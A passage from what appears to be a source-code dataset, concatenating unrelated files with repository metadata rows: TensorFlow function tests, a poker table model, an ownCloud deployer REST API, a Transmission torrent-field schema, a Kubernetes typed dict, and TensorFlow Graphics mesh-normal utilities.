with tf.Graph().as_default():
z = CubeXPlusY(3.0, -2.0)
with self.test_session():
self.assertAllEqual(z.eval(), 25.0)
def testNestedDefinedFunction(self):
@function.Defun(tf.float32, tf.float32)
def CubeXPlusY(x, y):
@function.Defun(tf.float32)
def Cube(x):
return x * x * x
return Cube(x) + y
with tf.Graph().as_default():
z = CubeXPlusY(3.0, -2.0)
with self.test_session():
self.assertAllEqual(z.eval(), 25.0)
def testUnusedFunction(self):
invoked = False
# pylint: disable=unused-variable
@function.Defun()
def Unused():
invoked = True
return tf.constant(42.)
self.assertFalse(invoked)
g = tf.Graph()
with g.as_default():
@function.Defun()
def Unused2():
invoked = True
return tf.constant(7.)
tf.constant(3.)
# pylint: enable=unused-variable
self.assertFalse(invoked)
gdef = g.as_graph_def()
self.assertEqual(0, len(gdef.library.function))
def testReduction(self):
g = tf.Graph()
# BN0 computes the batch-normalized matrix along rows.
def BN0(x):
mean = tf.reduce_mean(x, [0])
var = tf.reduce_mean(tf.square(x - mean)) # biased var
rstd = tf.rsqrt(var + 1e-8)
return (x - mean) * rstd
# Wraps BatchNorm in a tf function.
@function.Defun(tf.float32)
def BN1(x):
return BN0(x)
with g.as_default():
x = tf.placeholder(tf.float32)
y0 = BN0(x) # A plain graph
y1 = BN1(x) # A tf function
dx0, = tf.gradients([y0], [x])
dx1, = tf.gradients([y1], [x])
# Both should produce the same result and gradient.
with self.test_session(graph=g) as sess:
vals = sess.run([y0, y1, dx0, dx1], {x: np.random.uniform(size=(3, 7))})
self.assertAllClose(vals[0], vals[1])
self.assertAllClose(vals[2], vals[3])
def testDeclareTypeMistake(self):
foo = function.Declare("Foo", [tf.float32], [tf.float32])
@function.Defun(tf.float32, func_name="Foo")
def Foo(x):
return x * x + 1
g = tf.Graph()
with g.as_default():
y = foo(2.0)
with self.test_session(graph=g):
with self.assertRaisesRegexp(tf.errors.NotFoundError, "not registered"):
_ = y.eval()
g = tf.Graph()
with g.as_default():
Foo.add_to_graph(g)
y = foo(2)
with self.test_session(graph=g):
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,
"int32.*float"):
_ = y.eval()
g = tf.Graph()
with g.as_default():
Foo.add_to_graph(g)
with self.assertRaisesRegexp(
ValueError, "Expected number of arguments: 1, received: 2"):
_ = foo(2.0, 2.0)
g = tf.Graph()
with g.as_default():
Foo.add_to_graph(g)
y = foo(2.0)
with self.test_session(graph=g):
self.assertAllEqual(y.eval(), 5.0)
def testCapture(self):
g = tf.Graph()
with g.as_default():
w = tf.Variable(tf.constant([[1.0]]))
b = tf.Variable(tf.constant([2.0]))
# Foo() captures w and b.
@function.Defun(tf.float32)
def Foo(x):
# Plus() captures b.
@function.Defun(tf.float32)
def Plus(y):
return y + b
return Plus(tf.matmul(w, x))
y = Foo(tf.constant([[10.]]))
with self.test_session(graph=g):
tf.global_variables_initializer().run()
self.assertAllEqual(y.eval(), [[12.0]])
def testCaptureControls(self):
g = tf.Graph()
with g.as_default():
x = tf.constant([10.0])
x = tf.Print(x, [x], "outer")
@function.Defun(tf.float32)
def Foo(y):
with tf.control_dependencies([x]):
y = tf.Print(y, [y], "inner")
return y
with self.assertRaisesRegexp(ValueError, "not an element of this graph."):
# NOTE: We still do not support capturing control deps.
_ = Foo(x)
def testStableName(self):
@function.Defun()
def Foo(x, y, z):
return tf.tanh(tf.matmul(x, y) + z)
self.assertEqual("Foo_158cce4d", Foo.instantiate([tf.float32] * 3).name)
class FunctionOverloadTest(tf.test.TestCase):
def testBasic(self):
@function.Defun()
def Sinh(x):
return 1 / 2. * (tf.exp(x) - tf.exp(-x))
g = tf.Graph()
with g.as_default():
x = Sinh(tf.constant(0.25, tf.float32))
y = Sinh(tf.constant(0.25, tf.float64))
with self.test_session(graph=g):
self.assertAllClose(x.eval(), np.sinh(0.25))
self.assertAllClose(y.eval(), np.sinh(0.25))
def testGradient(self):
@function.Defun(func_name="Spec")
def G(x, dy):
return x * dy
@function.Defun(grad_func=G)
def F(x):
return tf.exp(x) - tf.exp(-x)
for dtype in [tf.float32, tf.float64]:
g = tf.Graph()
with g.as_default():
x = tf.constant(0.25, dtype)
y = F(x)
dx, = tf.gradients(y, x)
with self.test_session(graph=g):
self.assertAllClose(dx.eval(), 0.25)
def testDocString(self):
@function.Defun()
def Foo(x):
"""Successor of x."""
return x + 1
g = tf.Graph()
with g.as_default():
_ = Foo(1)
self.assertEqual(g.as_graph_def().library.function[0].signature.description,
"Successor of x.")
class UnrollLSTMTest(tf.test.TestCase):
BATCH_SIZE = 16
LSTM_DIMS = 32
NUM_UNROLL = 20
def _Weights(self):
dims = self.LSTM_DIMS
return tf.random_uniform([2 * dims, 4 * dims], -1, 1, seed=123456)
def _Input(self):
return tf.random_uniform(
[self.NUM_UNROLL, self.BATCH_SIZE, self.LSTM_DIMS], seed=654321)
# Helper to construct a LSTM cell graph.
@classmethod
def LSTMCell(cls, x, mprev, cprev, weights):
xm = tf.concat(1, [x, mprev])
i_i, i_g, f_g, o_g = tf.split(1, 4, tf.matmul(xm, weights))
new_c = tf.sigmoid(f_g) * cprev + tf.sigmoid(i_g) * tf.tanh(i_i)
new_c = tf.clip_by_value(new_c, -50.0, 50.0)
new_m = tf.sigmoid(o_g) * tf.tanh(new_c)
return new_m, new_c
def _BuildForward(self, weights, inp, mode="cell"):
def Loop(cell, w, i):
x = tf.unstack(i, self.NUM_UNROLL)
m = tf.zeros_like(x[0])
c = tf.zeros_like(x[0])
for i in range(self.NUM_UNROLL):
m, c = cell(x[i], m, c, w)
return m
cell = UnrollLSTMTest.LSTMCell
if mode == "complete":
# Constructs the complete graph in python.
return Loop(cell, weights, inp)
cell = function.Defun(tf.float32, tf.float32, tf.float32, tf.float32)(cell)
if mode == "cell":
# Just represent the LSTM as a function.
return Loop(cell, weights, inp)
if mode == "loop":
# Wraps the whole loop as a function.
@function.Defun(tf.float32, tf.float32)
def LSTMLoop(w, i):
return Loop(cell, w, i)
return LSTMLoop(weights, inp)
if mode == "loop10":
# Wraps 10 lstm steps into one function, and the whole loop
# into another that calls the former.
# Groups 10 steps at a time.
@function.Defun(tf.float32, tf.float32, tf.float32, *([tf.float32] * 10))
def Loop10(w, m, c, *args):
for x in args:
m, c = cell(x, m, c, w)
return m, c
@function.Defun(tf.float32, tf.float32)
def LSTMLoop10(weights, inp):
x = tf.unstack(inp, self.NUM_UNROLL)
m = tf.zeros_like(x[0])
c = tf.zeros_like(x[0])
assert self.NUM_UNROLL % 10 == 0
for i in range(0, self.NUM_UNROLL, 10):
m, c = Loop10(weights, m, c, *x[i:i + 10])
return m
return LSTMLoop10(weights, inp)
def testUnrollLSTM(self):
# Run one step of the unrolled lstm graph.
def RunForward(mode, cfg=None):
tf.logging.info("mode = %s", mode)
g = tf.Graph()
start = time.time()
with g.as_default():
weights = self._Weights()
inp = self._Input()
m = self._BuildForward(weights, inp, mode)
gdef = g.as_graph_def()
finish = time.time()
tf.logging.info("time: %f txt size: %d gdef bin size: %d", finish - start,
len(str(gdef)), len(gdef.SerializeToString()))
with g.as_default(), tf.Session(config=cfg) as sess:
return sess.run(m)
mv0 = RunForward("complete")
for cfg in _OptimizerOptions():
tf.logging.info("cfg = %s", cfg)
mv1 = RunForward("cell", cfg)
mv2 = RunForward("loop", cfg)
mv3 = RunForward("loop10", cfg)
self.assertAllClose(mv0, mv1, rtol=1e-4)
self.assertAllClose(mv0, mv2, rtol=1e-4)
self.assertAllClose(mv0, mv3, rtol=1e-4)
def testUnrollLSTMGrad(self):
# Run one step of the unrolled lstm graph.
def RunForwardBackward(mode, cfg=None):
tf.logging.info("mode = %s", mode)
g = tf.Graph()
start = time.time()
with g.as_default():
weights = self._Weights()
inp = self._Input()
m = self._BuildForward(weights, inp, mode)
loss = tf.reduce_sum(tf.square(m))
dw = tf.gradients([loss], [weights])
gdef = g.as_graph_def()
finish = time.time()
tf.logging.info("time: %f txt size: %d gdef bin size: %d", finish - start,
len(str(gdef)), len(gdef.SerializeToString()))
with g.as_default(), tf.Session(config=cfg) as sess:
return sess.run(dw)
d0 = RunForwardBackward("complete")
for cfg in _OptimizerOptions():
tf.logging.info("cfg = %s", cfg)
d1 = RunForwardBackward("cell", cfg)
d2 = RunForwardBackward("loop", cfg)
d3 = RunForwardBackward("loop10", cfg)
self.assertAllClose(d0, d1, rtol=1e-4)
self.assertAllClose(d0, d2, rtol=1e-4)
self.assertAllClose(d0, d3, rtol=1e-4)
class FunctionInlineControlTest(tf.test.TestCase):
def testFoo(self):
dtype = tf.float32
cfg = tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=True,
do_function_inlining=True,
do_constant_folding=True)))
for noinline in [False, True]:
@function.Defun(dtype, noinline=noinline)
def Cell(v):
# If v is a vector [n, 1], x is a big square matrix.
x = tf.tanh(v + tf.transpose(v, [1, 0]))
return tf.reduce_sum(x, 1, keep_dims=True)
@function.Defun(dtype)
def Forward(x):
for _ in range(10):
# pylint: disable=cell-var-from-loop
x = Cell(x)
return tf.reduce_sum(x, [0, 1])
self.assertEqual(noinline, Cell.definition.attr["_noinline"].b)
g = tf.Graph()
with g.as_default():
x = tf.placeholder(dtype)
y = Forward(x)
dx, = tf.gradients([y], [x])
np.random.seed(321)
inp = np.random.uniform(-1, 1, [16, 1]).astype(np.float32)
run_metadata = tf.RunMetadata()
with tf.Session(graph=g, config=cfg) as sess:
ans = sess.run(
[y, dx], {x: inp},
run_metadata=run_metadata,
options=tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE))
print(ans[0], np.sum(ans[1]))
self.assertAllClose(ans[0], 255.971, rtol=1e-3)
self.assertAllClose(np.sum(ans[1]), 13.0408, rtol=1e-3)
def MetadataHasCell(run_metadata):
for dev_stats in run_metadata.step_stats.dev_stats:
for node_stats in dev_stats.node_stats:
if "Cell" in node_stats.timeline_label:
return True
return False
self.assertEqual(MetadataHasCell(run_metadata), noinline)
@function.Defun(*[tf.float32] * 3)
def Linear(w, b, x):
return tf.nn.relu(tf.matmul(x, w) + b)
@function.Defun(*[tf.float32] * 5)
def Linear2(w1, b1, w2, b2, x):
return Linear(w2, b2, Linear(w1, b1, x))
class ModuleFunctionTest(tf.test.TestCase):
def testBasic(self):
with tf.Graph().as_default():
a, b, c, d, e = [tf.constant([[_]], dtype=tf.float32) for _ in range(5)]
y = Linear(a, b, c)
z = Linear2(a, b, c, d, e)
with tf.Session() as sess:
self.assertAllEqual([[1]], sess.run(y))
self.assertAllEqual([[5]], sess.run(z))
class VariableHoistingTest(tf.test.TestCase):
def _testSimpleModel(self, use_forward_func):
def _Model(x):
w = tf.get_variable(
"w", (64, 64), initializer=tf.random_uniform_initializer(seed=312))
b = tf.get_variable("b", (64), initializer=tf.zeros_initializer)
return tf.sigmoid(tf.matmul(x, w) + b)
@function.Defun()
def Model(x):
return _Model(x)
cvars = []
@function.Defun()
def Grad(x, y0):
if use_forward_func:
y = Model(x)
else:
y = _Model(x)
loss = tf.reduce_mean(tf.reduce_sum(y0 * tf.log(y), 1), 0)
arg_w, arg_b = function.get_extra_args()
self.assertEqual(arg_w.get_shape(), tf.TensorShape([64, 64]))
self.assertEqual(arg_b.get_shape(), tf.TensorShape([64]))
dw, db = tf.gradients(loss, [arg_w, arg_b])
cvars.extend(function.get_extra_vars())
return loss, dw, db
g = tf.Graph()
with g.as_default():
x = tf.random_normal([64, 64], seed=100)
y0 = tf.random_normal([64, 64], seed=200)
with tf.variable_scope("Foo"):
loss, dw, db = Grad(x, y0)
self.assertEqual(2, len(cvars))
w, b = cvars[:2]
self.assertEqual("Foo/w", w.op.name)
self.assertEqual("Foo/b", b.op.name)
with self.test_session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
w, b, x, y0, loss, dw, db = sess.run([w, b, x, y0, loss, dw, db])
self.assertAllEqual(w.shape, (64, 64))
self.assertAllClose(np.sum(w), 2050.44)
self.assertAllEqual(b.shape, (64,))
self.assertAllClose(np.sum(b), 0.0)
self.assertAllClose(loss, -2.27, rtol=1e-2)
self.assertAllEqual(dw.shape, (64, 64))
self.assertAllClose(np.sum(dw), -1.04, rtol=1e-2)
self.assertAllEqual(db.shape, (64,))
self.assertAllClose(np.sum(db), 0.509, rtol=1e-2)
def testBasic(self):
self._testSimpleModel(True)
self._testSimpleModel(False)
if __name__ == "__main__":
tf.test.main()
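# Editor-added sketch (not part of the original test file): the basic Defun pattern these
# tests exercise, using the same TF1-era API. Kept as a comment so it is not executed when
# the test module is imported.
#
# @function.Defun(tf.float32, tf.float32)
# def APlusB(a, b):
#   return a + b
#
# with tf.Graph().as_default(), tf.Session() as sess:
#   print(sess.run(APlusB(tf.constant(1.0), tf.constant(2.0))))  # -> 3.0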
| 29.928492 | 80 | 0.608004 |
178ed631f162a62ed2fc2c01c6e309f4d014545b | 3,019 | py | Python | backend/src/dealer/model/table.py | codepals-org/poker | 8b58df2ff4d3d9799c42652a9d6942d8ec6b3707 | [
"MIT"
] | 2 | 2020-11-07T16:37:14.000Z | 2020-11-07T17:11:24.000Z | backend/src/dealer/model/table.py | codepals-org/poker | 8b58df2ff4d3d9799c42652a9d6942d8ec6b3707 | [
"MIT"
] | 7 | 2020-11-07T14:04:06.000Z | 2020-11-11T11:49:13.000Z | backend/src/dealer/model/table.py | codepals-org/poker | 8b58df2ff4d3d9799c42652a9d6942d8ec6b3707 | [
"MIT"
] | 1 | 2020-11-08T13:00:27.000Z | 2020-11-08T13:00:27.000Z | from .player import Player, PlayerList
from typing import List
from enum import Enum, auto
import random
from typing import List
import logging
CARDS = [
# Card Abbreviations:
# https://commons.wikimedia.org/wiki/Category:SVG_playing_cards
"2H","3H","4H","5H","6H","7H","8H","9H","10H","JH","QH","KH","AH",
"2D","3D","4D","5D","6D","7D","8D","9D","10D","JD","QD","KD","AD",
"2S","3S","4S","5S","6S","7S","8S","9S","10S","JS","QS","KS","AS",
"2C","3C","4C","5C","6C","7C","8C","9C","10C","JC","QC","KC","AC"
]
class Phase(Enum):
REGISTRATION = auto() # Game has not started. Player able to take a seat.
PREFLOP = auto()
FLOP = auto()
TURN = auto()
RIVER = auto()
SHOWDOWN = auto()
class Table():
""" A Poker Table is where players can participate in a Poker Game """
def __init__(self, cash_per_player : float = 500,
small_blind :float = 10, big_blind :float = 20,
max_players :int = 8):
if max_players > 22:
raise ValueError("Maximum for a Poker Game is is 22 players.")
if max_players < 2:
raise ValueError("Minimum for a Poker Game is 2 players.")
self.cash_per_player :float = float(cash_per_player)
self.small_blind :float = float(small_blind)
self.big_blind :float = float(big_blind)
self.max_players :int = int(max_players)
self.phase :Phase = Phase.REGISTRATION
self.card_stack :List[str] = CARDS
random.shuffle(self.card_stack)
self.players = PlayerList(table=self)
self.community_cards :List[str] = []
def json(self):
return {
"id" : id(self),
"cash_per_player": self.cash_per_player,
"small_blind" : self.small_blind,
"big_blind" : self.big_blind,
"phase": self.phase
}
def signup(self, player :Player):
""" A player sits down at the table and gets the start budget"""
if self.phase != Phase.REGISTRATION:
raise RuntimeError("Game already started. No signups anymore.")
if len(self.players) >= self.max_players:
raise RuntimeError("Max players reached. No signups anymore.")
else:
self.players.append(player)
player.money_seat = self.cash_per_player
def start_game(self):
""" Start the game, hand out money to each player """
if self.phase != Phase.REGISTRATION:
raise RuntimeError("Game already started.")
if len(self.players) < 2:
raise RuntimeError("Not enough players to start the game.")
self.players.init_buttons()
self.players.deduct_blinds()
logging.warning(self.card_stack)
self.players.handout_cards(self.card_stack)
self.phase = Phase.PREFLOP
self.start_preflop()
def start_preflop(self):
self.players.who_starts().active = True
def call(self):
self.players.need_to_pay() | 35.104651 | 77 | 0.596555 |
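# Editor-added sketch (not part of the original module): seating players and starting a
# game with the Table API above; the Player instances are assumed to be constructed
# elsewhere (their constructor is defined in model.player, outside this file).
def _editor_example_start_game(players: List[Player]) -> Table:
    table = Table(cash_per_player=500, small_blind=10, big_blind=20, max_players=8)
    for player in players:
        table.signup(player)
    table.start_game()
    return table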
336689372db2a2331924ca3fa154281a420cffb5 | 3,995 | py | Python | jumpscale/packages/owncloud/bottle/api.py | threefoldtech/owncloud_deployer | d652d54a35d7a964f5f1b50ffbec0855ffd6f02f | [
"Apache-2.0"
] | null | null | null | jumpscale/packages/owncloud/bottle/api.py | threefoldtech/owncloud_deployer | d652d54a35d7a964f5f1b50ffbec0855ffd6f02f | [
"Apache-2.0"
] | null | null | null | jumpscale/packages/owncloud/bottle/api.py | threefoldtech/owncloud_deployer | d652d54a35d7a964f5f1b50ffbec0855ffd6f02f | [
"Apache-2.0"
] | null | null | null | import csv
from jumpscale.loader import j
from jumpscale.packages.auth.bottle.auth import admin_only, get_user_info, login_required
from jumpscale.packages.owncloud.models.users import UserStatus
from jumpscale.packages.owncloud.models import deployment_model
from bottle import Bottle, request, HTTPResponse, static_file
app = Bottle()
templates_path = j.sals.fs.join_paths(j.sals.fs.dirname(__file__), "templates")
env = j.tools.jinja2.get_env(templates_path)
DEPLOYMENT_QUEUE = "DEPLOYMENT_QUEUE"
@app.route("/api/requests", method=["GET"])
@login_required
@admin_only
def list_users():
"""List all users for admin
"""
users = []
for user_name in deployment_model.list_all():
user = deployment_model.get(user_name)
users.append(user.to_dict())
return HTTPResponse(
j.data.serializers.json.dumps(users),
status=200,
headers={"Content-Type": "application/json"},
)
@app.route("/api/requests", method=["POST"])
@login_required
def create_user():
"""Create new instance for user if new
- return 409 if user has registered before
"""
user_info = j.data.serializers.json.loads(get_user_info())
username = j.data.text.removesuffix(user_info.get("username"), ".3bot")
data = j.data.serializers.json.loads(request.body.read())
email = data.get("email")
if email == "":
email = user_info.get("email")
if username in deployment_model.list_all():
return HTTPResponse(
f"user {username} has already submitted a request. please be patient while we prepare your deployment",
status=409,
headers={"Content-Type": "application/json"},
)
user = deployment_model.get(username)
user.tname = username
user.email = email
user.status = UserStatus.NEW
user.time = j.data.time.utcnow().timestamp
user.save()
return HTTPResponse(
f"Your request will be processed soon. You'll receive your deployment information at {user.email}",
status=201,
headers={"Content-Type": "application/json"},
)
@app.route("/api/deployment", method=["POST"])
@login_required
@admin_only
def deploy_instances():
"""get json file for approved users and generate terraform files for them
"""
users = j.data.serializers.json.loads(request.body.read())
for username in users:
user = deployment_model.get(username)
if user.status in [UserStatus.APPLY_FAILURE, UserStatus.NEW]:
user.status = UserStatus.PENDING
user.save()
j.core.db.rpush(DEPLOYMENT_QUEUE, j.data.serializers.json.dumps(username))
return HTTPResponse(
{"success": True},
status=200,
headers={"Content-Type": "application/json"},
)
@app.route("/api/balance", method=["GET"])
@login_required
@admin_only
def get_balance():
"""get the main wallet current balance
"""
balance = j.tools.http.get("http://localhost:3001/balance").json()
return HTTPResponse(
balance,
status=200,
headers={"Content-Type": "application/json"},
)
@app.route("/api/requests/export")
@login_required
@admin_only
def export():
"""Export saved users as csv
"""
users = []
for user_name in deployment_model.list_all():
order = deployment_model.get(user_name)
users.append(order.to_dict())
if not users:
return {"Error": "File not found"}
path = j.sals.fs.join_paths(j.core.dirs.BASEDIR, "exports")
j.sals.fs.mkdirs(path)
time_now = j.data.time.utcnow().strftime("%Y_%m_%d_%H_%M_%S")
filename = f"export_{time_now}.csv"
filepath = j.sals.fs.join_paths(path, filename)
keys = list(users[0].keys())
with open(filepath, "w", newline="") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(keys)
for user in users:
writer.writerow(user[k] for k in keys)
return static_file(filename, root=path, download=filename)
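# Editor-added sketch (not part of the original module): a hypothetical client-side call to
# the request-creation endpoint above. The host, package mount path, and authentication
# cookie are assumptions; only the route and JSON payload come from this file.
#
# import requests
# resp = requests.post(
#     "https://deployer.example.com/owncloud/api/requests",
#     json={"email": "user@example.com"},
#     cookies={"session": "<an authenticated threebot session>"},
# )
# print(resp.status_code, resp.text)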
| 30.730769 | 115 | 0.665081 |
67f36500657d7757009a2cbcee518899f03906bf | 2,440 | py | Python | clutch/schema/request/torrent/accessor.py | ExeArco/clutch | 223244b1294b496ba16c8a2433eb453cce593a62 | [
"MIT"
] | 34 | 2018-04-14T12:53:07.000Z | 2021-08-21T12:52:23.000Z | clutch/schema/request/torrent/accessor.py | ExeArco/clutch | 223244b1294b496ba16c8a2433eb453cce593a62 | [
"MIT"
] | 18 | 2018-04-30T20:32:44.000Z | 2021-10-03T15:24:33.000Z | clutch/schema/request/torrent/accessor.py | ExeArco/clutch | 223244b1294b496ba16c8a2433eb453cce593a62 | [
"MIT"
] | 10 | 2019-01-31T20:21:13.000Z | 2021-10-03T10:01:26.000Z | from typing import Optional, Set
from pydantic import BaseModel, Field, validator
from clutch.compat import Literal
from clutch.network.rpc.convert import to_hyphen, to_camel
from clutch.schema.user.method.shared import IdsArg
AccessorFieldRequest = Literal[
"activityDate",
"addedDate",
"bandwidthPriority",
"comment",
"corruptEver",
"creator",
"dateCreated",
"desiredAvailable",
"doneDate",
"downloadDir",
"downloadedEver",
"downloadLimit",
"downloadLimited",
"editDate",
"error",
"errorString",
"eta",
"etaIdle",
"files",
"fileStats",
"hashString",
"haveUnchecked",
"haveValid",
"honorsSessionLimits",
"id",
"isFinished",
"isPrivate",
"isStalled",
"labels",
"leftUntilDone",
"magnetLink",
"manualAnnounceTime",
"maxConnectedPeers",
"metadataPercentComplete",
"name",
"peer-limit",
"peers",
"peersConnected",
"peersFrom",
"peersGettingFromUs",
"peersSendingToUs",
"percentDone",
"pieces",
"pieceCount",
"pieceSize",
"priorities",
"queuePosition",
"rateDownload",
"rateUpload",
"recheckProgress",
"secondsDownloading",
"secondsSeeding",
"seedIdleLimit",
"seedIdleMode",
"seedRatioLimit",
"seedRatioMode",
"sizeWhenDone",
"startDate",
"status",
"trackers",
"trackerStats",
"totalSize",
"torrentFile",
"uploadedEver",
"uploadLimit",
"uploadLimited",
"uploadRatio",
"wanted",
"webseeds",
"webseedsSendingToUs",
]
TorrentAccessorFieldsRequest = Set[AccessorFieldRequest]
class TorrentAccessorArgumentsRequest(BaseModel):
ids: Optional[IdsArg]
format: Optional[Literal["objects", "table"]]
accessor_fields: TorrentAccessorFieldsRequest = Field(
..., alias="fields"
) # this must be an alias for pydantic reasons
@validator("accessor_fields", pre=True)
def accessor_fields_format(cls, v):
if v is not None:
hyphenated = ["peer_limit"]
result = []
try:
for field in v:
if field in hyphenated:
result.append(to_hyphen(field))
else:
result.append(to_camel(field))
except TypeError:
return v
return result
else:
return v
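# Editor-added sketch (not part of the original module): the validator above rewrites
# snake_case accessor fields into the RPC wire names, e.g.
#
# request = TorrentAccessorArgumentsRequest(
#     fields={"peer_limit", "queue_position", "name"}
# )
# request.accessor_fields  # -> ["peer-limit", "queuePosition", "name"] (set order may vary)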
| 22.592593 | 58 | 0.597541 |
3e867f80d5a19232b064a8d79017691007f5df65 | 469 | py | Python | kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py | sobolevn/kubernetes-typed | 5f0a770631c73a9831fbeaeebac188e8f4a52c54 | [
"Apache-2.0"
] | 22 | 2020-12-10T13:06:02.000Z | 2022-02-13T21:58:15.000Z | kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py | sobolevn/kubernetes-typed | 5f0a770631c73a9831fbeaeebac188e8f4a52c54 | [
"Apache-2.0"
] | 4 | 2021-03-08T07:06:12.000Z | 2022-03-29T23:41:45.000Z | kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py | sobolevn/kubernetes-typed | 5f0a770631c73a9831fbeaeebac188e8f4a52c54 | [
"Apache-2.0"
] | 2 | 2021-09-05T19:18:28.000Z | 2022-03-14T02:56:17.000Z | # Code generated by `typeddictgen`. DO NOT EDIT.
"""ApiextensionsV1beta1WebhookClientConfigDict generated type."""
from typing import TypedDict
from kubernetes_typed.client import ApiextensionsV1beta1ServiceReferenceDict
ApiextensionsV1beta1WebhookClientConfigDict = TypedDict(
"ApiextensionsV1beta1WebhookClientConfigDict",
{
"caBundle": str,
"service": ApiextensionsV1beta1ServiceReferenceDict,
"url": str,
},
total=False,
)
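# Editor-added sketch (not part of the generated file): the TypedDict above only constrains
# static type checking; at runtime it is a plain dict, e.g.
#
# client_config: ApiextensionsV1beta1WebhookClientConfigDict = {
#     "url": "https://conversion-webhook.example.com/convert",
#     "caBundle": "<base64-encoded CA bundle>",
# }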
| 29.3125 | 76 | 0.763326 |
18aba273aabf87a58d4f4ee22cc8231a59082c8e | 9,199 | py | Python | tensorflow_graphics/geometry/representation/mesh/normals.py | drebain/graphics | c84b7599d1f8a55ccbdd589c1a845494c17c2784 | [
"Apache-2.0"
] | 1 | 2021-03-10T15:15:43.000Z | 2021-03-10T15:15:43.000Z | tensorflow_graphics/geometry/representation/mesh/normals.py | drebain/graphics | c84b7599d1f8a55ccbdd589c1a845494c17c2784 | [
"Apache-2.0"
] | null | null | null | tensorflow_graphics/geometry/representation/mesh/normals.py | drebain/graphics | c84b7599d1f8a55ccbdd589c1a845494c17c2784 | [
"Apache-2.0"
] | 1 | 2019-10-10T06:16:30.000Z | 2019-10-10T06:16:30.000Z | #Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tensorflow utility functions to compute normals on meshes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow_graphics.geometry.representation import triangle
from tensorflow_graphics.util import export_api
from tensorflow_graphics.util import safe_ops
from tensorflow_graphics.util import shape
def gather_faces(vertices, indices, name=None):
"""Gather corresponding vertices for each face.
Note:
In the following, A1 to An are optional batch dimensions.
Args:
vertices: A tensor of shape `[A1, ..., An, V, D]`, where `V` is the number
of vertices and `D` the dimensionality of each vertex. The rank of this
tensor should be at least 2.
indices: A tensor of shape `[A1, ..., An, F, M]`, where `F` is the number of
faces, and `M` is the number of vertices per face. The rank of this tensor
should be at least 2.
name: A name for this op. Defaults to "normals_gather_faces".
Returns:
A tensor of shape `[A1, ..., An, F, M, D]` containing the vertices of each
face.
Raises:
ValueError: If the shape of `vertices` or `indices` is not supported.
"""
with tf.compat.v1.name_scope(name, "normals_gather_faces",
[vertices, indices]):
vertices = tf.convert_to_tensor(value=vertices)
indices = tf.convert_to_tensor(value=indices)
shape.check_static(
tensor=vertices, tensor_name="vertices", has_rank_greater_than=1)
shape.check_static(
tensor=indices, tensor_name="indices", has_rank_greater_than=1)
shape.compare_batch_dimensions(
tensors=(vertices, indices),
last_axes=(-3, -3),
broadcast_compatible=False)
if hasattr(tf, "batch_gather"):
expanded_vertices = tf.expand_dims(vertices, axis=-3)
broadcasted_shape = tf.concat([tf.shape(input=indices)[:-1],
tf.shape(input=vertices)[-2:]],
axis=-1)
broadcasted_vertices = tf.broadcast_to(
expanded_vertices,
broadcasted_shape)
return tf.compat.v1.batch_gather(broadcasted_vertices, indices)
else:
return tf.gather(
vertices, indices, axis=-2, batch_dims=indices.shape.ndims - 2)
def face_normals(faces, clockwise=True, normalize=True, name=None):
"""Computes face normals for meshes.
This function supports planar convex polygon faces. Note that for
non-triangular faces, this function uses the first 3 vertices of each
face to calculate the face normal.
Note:
In the following, A1 to An are optional batch dimensions.
Args:
faces: A tensor of shape `[A1, ..., An, M, 3]`, which stores vertices
positions of each face, where M is the number of vertices of each face.
The rank of this tensor should be at least 2.
clockwise: Winding order to determine front-facing faces. The order of
vertices should be either clockwise or counterclockwise.
normalize: A `bool` defining whether output normals are normalized.
name: A name for this op. Defaults to "normals_face_normals".
Returns:
A tensor of shape `[A1, ..., An, 3]` containing the face normals.
Raises:
ValueError: If the shape of `vertices`, `faces` is not supported.
"""
with tf.compat.v1.name_scope(name, "normals_face_normals", [faces]):
faces = tf.convert_to_tensor(value=faces)
shape.check_static(
tensor=faces,
tensor_name="faces",
has_rank_greater_than=1,
has_dim_equals=(-1, 3),
has_dim_greater_than=(-2, 2))
vertices = tf.unstack(faces, axis=-2)
vertices = vertices[:3]
return triangle.normal(*vertices, clockwise=clockwise, normalize=normalize)
def vertex_normals(vertices, indices, clockwise=True, name=None):
"""Computes vertex normals from a mesh.
This function computes vertex normals as the weighted sum of the adjacent
face normals, where the weights correspond to the area of each face. This
function supports planar convex polygon faces. For non-triangular meshes,
this function converts them into triangular meshes to calculate vertex
normals.
Note:
In the following, A1 to An are optional batch dimensions.
Args:
vertices: A tensor of shape `[A1, ..., An, V, 3]`, where V is the number of
vertices.
indices: A tensor of shape `[A1, ..., An, F, M]`, where F is the number of
faces and M is the number of vertices per face.
clockwise: Winding order to determine front-facing faces. The order of
vertices should be either clockwise or counterclockwise.
name: A name for this op. Defaults to "normals_vertex_normals".
Returns:
A tensor of shape `[A1, ..., An, V, 3]` containing vertex normals. If
vertices and indices have different batch dimensions, this function
broadcasts them into the same batch dimensions and the output batch
dimensions are the broadcasted.
Raises:
ValueError: If the shape of `vertices`, `indices` is not supported.
"""
with tf.compat.v1.name_scope(name, "normals_vertex_normals",
[vertices, indices]):
vertices = tf.convert_to_tensor(value=vertices)
indices = tf.convert_to_tensor(value=indices)
shape.check_static(
tensor=vertices,
tensor_name="vertices",
has_rank_greater_than=1,
has_dim_equals=(-1, 3))
shape.check_static(
tensor=indices,
tensor_name="indices",
has_rank_greater_than=1,
has_dim_greater_than=(-1, 2))
shape.compare_batch_dimensions(
tensors=(vertices, indices),
last_axes=(-3, -3),
broadcast_compatible=True)
shape_indices = indices.shape.as_list()
if None in shape_indices[:-2]:
raise ValueError("'indices' must have specified batch dimensions.")
